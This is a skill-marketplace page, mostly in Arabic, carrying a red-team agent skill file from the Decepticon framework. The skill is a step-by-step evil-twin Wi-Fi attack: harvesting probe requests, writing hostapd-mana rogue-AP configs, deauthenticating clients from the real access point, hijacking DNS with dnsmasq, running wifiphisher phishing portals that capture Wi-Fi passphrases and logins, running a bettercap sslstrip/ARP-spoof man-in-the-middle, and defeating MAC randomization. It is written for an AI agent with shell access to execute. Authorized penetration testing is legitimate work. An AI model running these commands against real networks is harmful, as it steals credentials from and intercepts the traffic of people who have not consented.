تشغيل أي مهارة في Manus بنقرة واحدة

evil-twin-karma

النجوم٤٬٤٤٥

التفرعات٨٧٨

آخر تحديث٢ يونيو ٢٠٢٦ في ٢١:٠٤

Evil-twin rogue AP with KARMA/Mana PNL-probe response, captive-portal credential capture, and post-association MITM for PSK/open networks. Distinct from wpa-enterprise-eap which targets 802.1X.

التثبيت

التثبيت باستخدام Codex أو Claude انسخ هذا Prompt والصقه في Codex أو Claude أو مساعد آخر ليراجع صفحة Skill ويثبّتها لك.

تشغيل في Manus

المصدر

PurpleAILAB

PurpleAILAB/Decepticon

فتح مستودع GitHub عرض مستودعات المنشئ

تنزيل

تشغيل في Manus

المهن ذات الصلةSOC

استنادا إلى تصنيف SOC المهني

محللو أمن المعلوماتمهن الحاسوب والرياضيات·SOC 15-1212

SKILL.md

readonly

المزيد من هذا المستودع

نفس المستودع

decepticon

PurpleAILAB/Decepticon

Drive Decepticon — an autonomous multi-agent red-team framework — over MCP to run authorized penetration tests and bug-bounty engagements end to end, then watch and steer them live from chat. Launch an engagement against a target, poll its transcript to narrate progress, send messages to refocus it, and pull findings as SARIF. Use when the user asks to run a pentest/red-team engagement, hunt a bug bounty, do recon, exploit/scan a host, web app, API, network, cloud, Active Directory, mobile app, or smart contract WITH Decepticon — or to check/resume a running engagement or report what Decepticon found. Triggers: run a decepticon engagement, pentest this with decepticon, bug bounty, recon this target, red team this, scan this host, resume the engagement, what did decepticon find, decepticon status. Do NOT use for ad-hoc local tool runs (running nmap/sqlmap/ffuf directly) when no Decepticon server is involved — this drives the Decepticon orchestrator, not raw tools.

2026-06-164.4k

iot-security

PurpleAILAB/Decepticon

IoT device security reconnaissance — firmware extraction, embedded analysis, protocol identification, default credential checking, vulnerability scanning, device fingerprinting.

2026-06-154.4k

mobile-security

PurpleAILAB/Decepticon

Mobile application security reconnaissance — APK/IPA analysis, permission enumeration, certificate validation, hardcoded secret detection, insecure storage identification, network security analysis.

2026-06-154.4k

wireless-security

PurpleAILAB/Decepticon

Wireless network security reconnaissance — WiFi analysis, Bluetooth assessment, RFID/NFC evaluation, signal capture, protocol analysis, encryption testing, rogue device detection.

2026-06-154.4k

finding-protocol

PurpleAILAB/Decepticon

Operational-tier finding template — minimal fields for sub-agent decision support. Heavyweight deliverable promotion lives in skills/decepticon/final-report.

2026-06-124.4k

engagement-lifecycle

PurpleAILAB/Decepticon

Red team engagement lifecycle management — initiation, phase transitions, go/no-go gates, deconfliction, emergency procedures, completion.

2026-06-124.4k

name	evil-twin-karma
description	Evil-twin rogue AP with KARMA/Mana PNL-probe response, captive-portal credential capture, and post-association MITM for PSK/open networks. Distinct from wpa-enterprise-eap which targets 802.1X.
allowed-tools	Bash Read Write
metadata	{"subdomain":"wireless","when_to_use":"evil twin, KARMA, Mana, rogue AP, captive portal, hostapd-mana, wifiphisher, airgeddon, PNL, probe response, client coercion, PSK phishing, open network MITM","tags":["evil-twin","karma","mana","rogue-ap","captive-portal","mitm"],"mitre_attack":"T1557, T1556, T1598"}

Evil Twin / KARMA / Mana Rogue AP

RoE hard stop (mirrors the wireless workflow loaded into your system prompt): NEVER bring up an evil-twin AP on public airspace without permitted_actions: evil_twin recorded in plan/roe.json for this session. Confirm iw reg get before any TX. This applies even on posture=loud — explicit operator approval is required.

Prerequisites

TX-capable adapter (not just monitor mode).
Tools: hostapd-mana, wifiphisher (portal templates), airgeddon (menu-driven alternative), dnsmasq, bettercap.
Second adapter for deauth (optional but increases coercion speed).
plan/roe.json must contain permitted_actions: evil_twin and valid regulatory TX authorization.

Step 1 — PNL / probe-request harvest

Preferred-Network List (PNL) probe requests reveal SSIDs a device will auto-associate to. Passive harvest before standing up the rogue AP:

# Capture probe requests (passive, no TX required)
sudo airodump-ng --output-format csv -w /tmp/probes <mon-iface>
# Probe column shows client MAC → SSID pairs

# Or use bettercap's wifi.recon
sudo bettercap -iface <mon-iface> \
    -eval "wifi.recon on; set wifi.show.sort clients desc; ticker on"
# Shows associated clients and their probe history

# KARMA universal: respond to ANY probe with a matching SSID.
# Mana selective: only respond to probes for SSIDs you choose
#   (lower noise, avoids responding to enterprise SSIDs that
#    require 802.1X — route those to wpa-enterprise-eap instead).

# Identify high-value targets:
# - Devices probing for open SSIDs (no PSK needed → immediate MITM)
# - Devices probing for PSK SSIDs you already know the passphrase for
# - Devices with MAC randomization disabled (OUI visible in probe SA)

Step 2 — Stand up rogue AP with hostapd-mana

# /tmp/mana.conf — open AP with KARMA/Mana response
cat > /tmp/mana.conf << 'EOF'
interface=<iface>
driver=nl80211
ssid=<TARGET_SSID>
hw_mode=g
channel=<CHANNEL>
mana_enable=1
mana_credout=/tmp/mana_creds.txt
mana_loud=0
EOF

sudo hostapd-mana /tmp/mana.conf

# mana_loud=0 → Mana selective (probe-response-only)
# mana_loud=1 → KARMA universal (respond to all probes)

# For a PSK-matching evil twin (clone of a known WPA2 PSK network):
cat > /tmp/evil_twin_psk.conf << 'EOF'
interface=<iface>
driver=nl80211
ssid=<TARGET_SSID>
hw_mode=g
channel=<CHANNEL>
wpa=2
wpa_passphrase=<KNOWN_PSK>
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
mana_enable=1
mana_credout=/tmp/mana_creds.txt
EOF

sudo hostapd-mana /tmp/evil_twin_psk.conf

Step 3 — Deauth-driven roaming coercion

# Deauth clients from the legitimate AP to accelerate association
# with the rogue AP. Requires permitted_actions: deauth_for_handshake_capture.
# Cross-reference deauth-pmf skill for PMF detection first.
sudo aireplay-ng --deauth 5 -a <LEGIT_BSSID> -c <CLIENT_MAC> <mon-iface2>

# Broadcast deauth (loud, posture=loud only):
sudo aireplay-ng --deauth 0 -a <LEGIT_BSSID> <mon-iface2>
# Note: broadcast deauth blocked by 802.11w/PMF; check PMF state first.

Step 4 — DHCP + DNS for associated clients

# dnsmasq: DHCP server + DNS for clients on the rogue AP
cat > /tmp/dnsmasq.conf << 'EOF'
interface=<iface>
dhcp-range=10.0.0.10,10.0.0.100,255.255.255.0,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
address=/#/10.0.0.1
log-queries
EOF

sudo ip addr add 10.0.0.1/24 dev <iface>
sudo ip link set <iface> up
sudo dnsmasq -C /tmp/dnsmasq.conf --no-daemon &

Step 5 — Captive portal credential capture (wifiphisher)

# wifiphisher automated portal attack
sudo wifiphisher \
    --essid "<TARGET_SSID>" \
    --channel <CHANNEL> \
    -p firmware-upgrade \
    --handshake-capture /tmp/wpa2_handshake.pcap

# Built-in portal templates:
#   firmware-upgrade    → asks for Wi-Fi PSK to "install firmware"
#   oauth-login         → OAuth/social login credential capture
#   wifi-connect        → generic Wi-Fi reconnect with PSK prompt
#   plugin_update       → browser plugin update (payload delivery)

# Captured credentials written to wifiphisher's output log.
# For custom portal: --phishing-pages-directory /path/to/custom/

# Manual transparent MITM with bettercap after client connects:
sudo bettercap -iface <iface> \
    -eval "
        set http.proxy.sslstrip true;
        set net.sniff.verbose false;
        net.probe on;
        arp.spoof on;
        http.proxy on;
        net.sniff on
    "
# bettercap captures credentials from HTTP/stripped HTTPS sessions.
# Output to /tmp/bettercap_creds.log

Step 6 — MAC-randomization defeat

Modern OS (Android 10+, iOS 14+, Windows 10+) use random MACs for probe requests, complicating targeting:

# De-anonymize via PNL analysis:
# 1. Capture probes over time; filter by sequence number continuity
#    (same device reuses sequence counter across random MACs).
tshark -r /tmp/probes-01.cap -Y "wlan.fc.type_subtype == 4" \
    -T fields -e wlan.sa -e wlan_mgt.ssid -e wlan.seq 2>/dev/null \
    | sort -k1,1 -k3,3n > /tmp/probe_seqs.txt

# 2. Same device will show incrementing seq nums even with different MACs.
# 3. Once the device associates to your rogue AP, it uses its real MAC
#    (most implementations reset randomization on association).

Evidence

# Portal-captured credential
kg_add_node(
    kind="credential",
    label=f"Captive portal PSK for {ssid}",
    props={
        "key": f"portal-cred::{bssid}::{client_mac}",
        "secret_type": "wpa_psk_phished",
        "ssid": ssid,
        "bssid": bssid,
        "client_mac": client_mac,
        "psk": psk,
        "portal_template": template_name,
        "captured_at": "<iso8601>",
        "source": "wifiphisher-portal",
    },
)

# PNL leak finding
kg_add_node(
    kind="finding",
    label="Client PNL Probe Leakage — Evil-Twin Viable",
    props={
        "key": f"pnl-leak::{client_mac}",
        "severity": "high",
        "exposed_ssids": [<ssid_list>],
        "client_mac": client_mac,
        "remediation": (
            "Enable MAC randomization and disable 'auto-connect' for "
            "saved networks. Use WPA3 with Protected Management Frames "
            "to prevent deauth-driven roaming."
        ),
    },
)

ZFP

airodump CSV showing client probe requests for target SSID.
hostapd-mana log showing client association to rogue AP.
wifiphisher output or bettercap log showing captured credential.
(Optional) Pcap of the full association + DHCP + portal flow.

OPSEC notes

Mana selective is quieter than KARMA universal — only probed SSIDs get a response, reducing unexpected associations and WIDS alerts.
Open AP (no PSK) has the fastest client association but exposes the rogue AP to casual discovery.
wifiphisher generates detectable management frames; WIDS tuned for rogue APs will fire. Default posture: loud.
Deauth coercion amplifies WIDS visibility; use single targeted deauth (--deauth 1) over broadcast where possible.
Tear down the rogue AP immediately after credential capture to minimize dwell and collateral client disruption.

References

hostapd-mana: github.com/sensepost/hostapd-mana
wifiphisher: github.com/wifiphisher/wifiphisher
airgeddon: github.com/v1s1t0r1sh3r3/airgeddon
bettercap: bettercap.org
wpa-enterprise-eap skill — use instead for 802.1X/MGT targets.
deauth-pmf skill — PMF detection and targeted deauth mechanics.
wpa3-sae skill — Path D captive portal for SAE networks.